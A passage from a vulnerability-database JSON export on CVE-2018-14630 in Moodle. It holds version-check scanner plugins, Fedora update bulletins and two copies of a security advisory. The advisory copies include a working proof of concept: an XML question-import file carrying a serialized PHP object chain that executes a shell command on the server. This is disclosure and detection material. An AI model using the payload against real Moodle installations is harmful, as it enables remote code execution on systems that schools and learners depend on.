versions.\");\n script_tag(name:\"solution\", value:\"Update to version 3.1.14, 3.3.8, 3.4.5 or 3.5.2 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-14630\");\n script_xref(name:\"URL\", value:\"https://moodle.org/mod/forum/discuss.php?d=376023\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:moodle:moodle\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( port: port, cpe:CPE, exit_no_version:TRUE ) ) exit( 0 );\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.1.14\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.1.14\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.2.0\", test_version2: \"3.3.7\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.3.8\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.4.0\", test_version2: \"3.4.4\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.4.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"3.5.0\", test_version2: \"3.5.1\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.5.2\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound 
pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2018-09-26T20:23:25", "published": "2018-09-26T20:23:25", "id": "FEDORA:8A2B4605A2AB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: moodle-3.5.2-1.fc29", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. ", "modified": "2018-09-27T02:36:13", "published": "2018-09-27T02:36:13", "id": "FEDORA:EFB656087D8D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: moodle-3.4.5-1.fc28", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2018-14630"], "description": "Moodle is a course management system (CMS) - a free, Open Source software package designed using sound pedagogical principles, to help educators crea te effective online learning communities. 
", "modified": "2018-09-26T20:18:36", "published": "2018-09-26T20:18:36", "id": "FEDORA:0B2626057155", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: moodle-3.3.8-1.fc27", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:18:39", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "title": "Fedora 28 : moodle (2018-690535d30b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "modified": "2019-01-03T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:moodle", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-690535D30B.NASL", "href": "https://www.tenable.com/plugins/nessus/120492", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-690535d30b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120492);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-690535d30b\");\n\n script_name(english:\"Fedora 28 : moodle (2018-690535d30b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has 
extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-690535d30b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"moodle-3.4.5-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:19:09", "description": "Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": 
"2019-01-03T00:00:00", "title": "Fedora 29 : moodle (2018-84a5340cc9)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630"], "modified": "2019-01-03T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:moodle"], "id": "FEDORA_2018-84A5340CC9.NASL", "href": "https://www.tenable.com/plugins/nessus/120581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-84a5340cc9.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120581);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-14630\");\n script_xref(name:\"FEDORA\", value:\"2018-84a5340cc9\");\n\n script_name(english:\"Fedora 29 : moodle (2018-84a5340cc9)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-14630\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-84a5340cc9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moodle package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moodle\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"moodle-3.5.2-1.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moodle\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T02:45:27", "description": "moodle reports :\n\nMoodle XML import of ddwtos could lead to intentional remote code\nexecution\n\nQuickForm library remote code vulnerability (upstream)\n\nBoost theme - blog search GET parameter insufficiently filtered", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-19T00:00:00", "title": "FreeBSD : moodle -- multiple vulnerabilities (074cb225-bb2d-11e8-90e1-fcaa147e860e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14630", "CVE-2018-14631", "CVE-2018-1999022"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:moodle34", "p-cpe:/a:freebsd:freebsd:moodle33", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:moodle31", "p-cpe:/a:freebsd:freebsd:moodle35"], "id": "FREEBSD_PKG_074CB225BB2D11E890E1FCAA147E860E.NASL", "href": "https://www.tenable.com/plugins/nessus/117594", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and 
contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117594);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-14630\", \"CVE-2018-14631\", \"CVE-2018-1999022\");\n\n script_name(english:\"FreeBSD : moodle -- multiple vulnerabilities (074cb225-bb2d-11e8-90e1-fcaa147e860e)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"moodle reports :\n\nMoodle XML import of ddwtos could lead to intentional remote code\nexecution\n\nQuickForm library remote code vulnerability (upstream)\n\nBoost theme - blog search GET parameter insufficiently filtered\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://moodle.org/mod/forum/discuss.php?d=376023\"\n );\n # https://vuxml.freebsd.org/freebsd/074cb225-bb2d-11e8-90e1-fcaa147e860e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b1a34a67\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle31\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle33\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle34\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:moodle35\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"moodle31<3.1.14\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle33<3.3.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle34<3.4.5\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"moodle35<3.5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-09-19T23:39:07", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-09-19T00:00:00", "title": "Moodle 3.x PHP Unserialize Remote Code Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14630"], "modified": "2018-09-19T00:00:00", "id": "1337DAY-ID-31126", "href": "https://0day.today/exploit/description/31126", "sourceData": "=======================================================================\r\n title: Remote Code Execution via PHP unserialize\r\n product: Moodle - Open-source learning platform\r\n vulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and\r\n earlier unsupported versions\r\n fixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14\r\n CVE number: CVE-2018-14630\r\n impact: critical\r\n homepage: 
https://moodle.org/\r\n\r\n=======================================================================\r\n\r\nVendor description:\r\n-------------------\r\n\"Moodle is a learning platform designed to provide educators, administrators\r\nand learners with a single robust, secure and integrated system to create\r\npersonalised learning environments. Powering tens of thousands of learning\r\nenvironments globally, Moodle is trusted by institutions and organisations\r\nlarge and small, including Shell, London School of Economics,\r\nState University of New York, Microsoft and the Open University. Moodle's\r\nworldwide numbers of more than 90 million users across both academic and\r\nenterprise level usage makes it the world's most widely used learning platform.\"\r\n\r\nSource: https://moodle.org/about\r\n\r\n\r\nBusiness recommendation:\r\n------------------------\r\nThe vendor provides a patch which should be installed immediately.\r\n\r\nSEC Consult recommends to perform a thorough security review conducted by\r\nsecurity professionals to identify and resolve all security issues.\r\n\r\n\r\nVulnerability overview/description:\r\n-----------------------------------\r\n1) Remote Code Execution via PHP unserialize (CVE-2018-14630)\r\nWhen importing a \"drag and drop into text\" (ddwtos) question in the legacy\r\nMoodle XML format, the passed feedback answer is used unsanitized in an\r\nunserialize() function, which leads to a PHP Object Injection vulnerability.\r\nBy providing a sophisticated PHP Object chain it is possible to leverage the\r\nPOI into a fully-blown arbitrary Remote Code Execution (RCE).\r\n\r\nTo exploit this vulnerability an attacker needs permissions to create a quiz\r\nor at least be able to import questions. A user of the role teacher usually has\r\nthese permissions. 
However, students can also be assigned to the role teacher for\r\na specific course.\r\n\r\n\r\nProof of concept:\r\n-----------------\r\n1) Remote Code Execution via PHP unserialize (CVE-2018-14630)\r\nIn order to exploit this issue an attacker has to open Moodle's question bank\r\nfor a specific course and import the following Moodle XML file. The answer\r\nfeedback contains a sophisticated PHP object chain which only contains objects\r\nfrom Moodles library. After the parsing process the command \"echo `whoami`\" is\r\nbeing executed.\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<quiz>\r\n <question type=\"ddwtos\">\r\n <name>\r\n <text>question name</text>\r\n </name>\r\n <questiontext format=\"html\">\r\n <text><![CDATA[<p>How is the weather?<br></p>]]></text>\r\n </questiontext>\r\n <answer fraction=\"100\">\r\n <feedback format=\"html\">\r\n <text>\r\n\r\nO:15:\"\\\\core\\\\lock\\\\lock\":2:{s:3:\"key\";O:23:\"\\\\core_availability\\\\tree\":1:{s:8:\"children\";O:24:\"\\\\core\\\\dml\\\\recordset_walk\":2:{s:8:\"callback\";s:6:\"system\";s:9:\"recordset\";O:25:\"question_attempt_iterator\":2:\r\n\r\n{s:4:\"quba\";O:26:\"question_usage_by_activity\":1:{s:16:\"questionattempts\";a:1:{s:4:\"1337\";s:13:\"echo\r\n`whoami`\";}}s:5:\"slots\";a:1:{i:0;i:1337;}}}}s:8:\"infinite\";i:1;}\r\n </text>\r\n </feedback>\r\n </answer>\r\n </question>\r\n</quiz>\r\n\r\n\r\nVulnerable / tested versions:\r\n-----------------------------\r\nThe following version has been tested which was the most recent one at the\r\ntime of the test:\r\n\r\n* 3.5.1+\r\n\r\nAccording to the vendor, all previous versions are affected as well:\r\n* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions\r\n\r\n\r\nVendor contact timeline:\r\n------------------------\r\n2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie\r\n from RIPS Technologies)\r\n2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880]\r\n 
created)\r\n2018-07-09: Vendor replied and supplied a fix for the vulnerability\r\n2018-09-10: Vendor releases patched version\r\n2018-09-18: Public release of security advisory\r\n\r\n\r\nSolution:\r\n---------\r\nThe vendor provides a patched version (3.5.2) which should be installed immediately:\r\nhttps://download.moodle.org/releases/latest/\r\n\r\nThe vendor also provided a security advisory regarding this issue:\r\nhttps://moodle.org/mod/forum/discuss.php?d=376023#p1516118\r\n\r\n\r\nWorkaround:\r\n-----------\r\nDisable import of ddwtos questions through XML files.\n\n# 0day.today [2018-09-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31126"}], "packetstorm": [{"lastseen": "2018-09-19T10:10:10", "description": "", "published": "2018-09-19T00:00:00", "type": "packetstorm", "title": "Moodle 3.x PHP Unserialize Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14630"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149426", "href": "https://packetstormsecurity.com/files/149426/Moodle-3.x-PHP-Unserialize-Remote-Code-Execution.html", "sourceData": "`SEC Consult Vulnerability Lab Security Advisory < 20180918-0 > \n======================================================================= \ntitle: Remote Code Execution via PHP unserialize \nproduct: Moodle - Open-source learning platform \nvulnerable version: 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and \nearlier unsupported versions \nfixed version: 3.5.2, 3.4.5, 3.3.8 and 3.1.14 \nCVE number: CVE-2018-14630 \nimpact: critical \nhomepage: https://moodle.org/ \nfound: 2018-07-08 \nby: Johannes Moritz (Office Berlin) \nSEC Consult Vulnerability Lab \n \nAn integrated part of SEC Consult \nEurope | Asia | North America \n \nhttps://www.sec-consult.com \n \n======================================================================= \n \nVendor description: \n------------------- \n\"Moodle is a learning platform designed to provide educators, 
administrators \nand learners with a single robust, secure and integrated system to create \npersonalised learning environments. Powering tens of thousands of learning \nenvironments globally, Moodle is trusted by institutions and organisations \nlarge and small, including Shell, London School of Economics, \nState University of New York, Microsoft and the Open University. Moodle's \nworldwide numbers of more than 90 million users across both academic and \nenterprise level usage makes it the world's most widely used learning platform.\" \n \nSource: https://moodle.org/about \n \n \nBusiness recommendation: \n------------------------ \nThe vendor provides a patch which should be installed immediately. \n \nSEC Consult recommends to perform a thorough security review conducted by \nsecurity professionals to identify and resolve all security issues. \n \n \nVulnerability overview/description: \n----------------------------------- \n1) Remote Code Execution via PHP unserialize (CVE-2018-14630) \nWhen importing a \"drag and drop into text\" (ddwtos) question in the legacy \nMoodle XML format, the passed feedback answer is used unsanitized in an \nunserialize() function, which leads to a PHP Object Injection vulnerability. \nBy providing a sophisticated PHP Object chain it is possible to leverage the \nPOI into a fully-blown arbitrary Remote Code Execution (RCE). \n \nTo exploit this vulnerability an attacker needs permissions to create a quiz \nor at least be able to import questions. A user of the role teacher usually has \nthese permissions. However, students can also be assigned to the role teacher for \na specific course. \n \n \nProof of concept: \n----------------- \n1) Remote Code Execution via PHP unserialize (CVE-2018-14630) \nIn order to exploit this issue an attacker has to open Moodle's question bank \nfor a specific course and import the following Moodle XML file. 
The answer \nfeedback contains a sophisticated PHP object chain which only contains objects \nfrom Moodles library. After the parsing process the command \"echo `whoami`\" is \nbeing executed. \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<quiz> \n<question type=\"ddwtos\"> \n<name> \n<text>question name</text> \n</name> \n<questiontext format=\"html\"> \n<text><![CDATA[<p>How is the weather?<br></p>]]></text> \n</questiontext> \n<answer fraction=\"100\"> \n<feedback format=\"html\"> \n<text> \n \nO:15:\"\\\\core\\\\lock\\\\lock\":2:{s:3:\"key\";O:23:\"\\\\core_availability\\\\tree\":1:{s:8:\"children\";O:24:\"\\\\core\\\\dml\\\\recordset_walk\":2:{s:8:\"callback\";s:6:\"system\";s:9:\"recordset\";O:25:\"question_attempt_iterator\":2: \n \n{s:4:\"quba\";O:26:\"question_usage_by_activity\":1:{s:16:\"questionattempts\";a:1:{s:4:\"1337\";s:13:\"echo \n`whoami`\";}}s:5:\"slots\";a:1:{i:0;i:1337;}}}}s:8:\"infinite\";i:1;} \n</text> \n</feedback> \n</answer> \n</question> \n</quiz> \n \n \nVulnerable / tested versions: \n----------------------------- \nThe following version has been tested which was the most recent one at the \ntime of the test: \n \n* 3.5.1+ \n \nAccording to the vendor, all previous versions are affected as well: \n* 3.5 to 3.5.1, 3.4 to 3.4.4, 3.1 to 3.1.13 and earlier unsupported versions \n \n \nVendor contact timeline: \n------------------------ \n2018-07-08: Vulnerability identified, further analysis (credits to Robin Peraglie \nfrom RIPS Technologies) \n2018-07-09: Contacting vendor through tracker.moodle.org (issue [MDL-62880] \ncreated) \n2018-07-09: Vendor replied and supplied a fix for the vulnerability \n2018-09-10: Vendor releases patched version \n2018-09-18: Public release of security advisory \n \n \nSolution: \n--------- \nThe vendor provides a patched version (3.5.2) which should be installed immediately: \nhttps://download.moodle.org/releases/latest/ \n \nThe vendor also provided a security advisory regarding this issue: 
